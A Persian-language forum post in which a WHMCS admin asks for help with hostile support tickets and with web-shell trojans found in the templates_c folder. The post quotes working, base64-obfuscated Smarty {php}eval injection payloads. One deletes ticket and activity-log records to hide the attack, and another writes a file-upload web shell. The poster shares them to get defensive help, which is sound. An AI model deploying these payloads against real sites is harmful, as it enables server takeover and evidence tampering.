سلام
من از سیستم whmcs استفاده می کنم .
جدیدا تیکت هایی ارسال می شوند که محتوا آن به صورت کد شده هستند در پایان محتوا را برای شما قرار می دهم ببینید می توانید دی کد کنید .
آیا این نوع تیکت ها حمله هکر ها می باشد؟
چگونه میشوند جلوی این کار رو گرفت؟
البته من آی پی ها رو مسدود می کنم ولی باز از یک آی پی دیگر وارد می شوند آی پی ها از کشور های عربی است
چگونه می توانم در سیتم تنظیم کنم که برای ارسال تیکت باید حتما ثبت نام کنند
ممنونم
کد:
{php}eval(base64_decode('aW5jbHVkZSgnY29uZmlndXJhdGlvbi5waHAnKTsNCiRkYj1teXNxbF9jb25uZWN0KCRkYl9ob3N0LCRkYl91c2VybmFtZSwkZGJfcGFzc3dvcmQpIG9yIGRpZSgiQ2FuJ3Qgb3BlbiBjb25uZWN0aW9uIHRvIE15U1FMIik7DQpteXNxbF9zZWxlY3RfZGIoJGRiX25hbWUpIG9yIGRpZSgiQ2FuJ3Qgc2VsZWN0IGRhdGFiYXNlIik7DQokZGVsZXRlID0iREVMRVRFIGZyb20gdGJsdGlja2V0cyBXSEVSRSB0aXRsZSBsaWtlIDB4MjU3QjcwNjg3MDdEMjU7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUpOw0KJGRlbGV0ZTIgPSJERUxFVEUgZnJvbSB0YmxhY3Rpdml0eWxvZyAgV0hFUkUgaXBhZGRyPSciLiRfU0VSVkVSWydSRU1PVEVfQUREUiddLiInOyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlMik7'));{/php}
کد:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
کد:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
من هاست و رو اسکن کردم
یک فایل تو پوشه templates_c در روت اصلی به نام PHP.Shell-38 وجود داشت.
البته یک تیکت دیگه ای هم اومد با محتوا کد های کد شده .
سوالم اینه که به چه صورت این فایل در این فولدر قرار گرفته
قبلا هم در همین پوشه یک فایلی بود که آنتی ویروس نود 32 شناخت ولی سی پنل کاری انجام نداد
ممنون میشوم بفرمایید که به چه صورت این فایل قرار گرفته و دیگر اینکه چه کارهایی باید انجام بدم تا دیگر چنین مشکل هایی پیش نیاد
با تشکر

العان محتوا پوشه templates_c را زیپ کردم پس از دانلود با نود 32 اسکن کردم متاسفانه 4 فایل تروجان با نام های
Kryptik.AB trojan که 3 نوع با این نام
WebShell.NAA trojan و 1 فایل به این نام وجو دارد
لطفا کمک کنید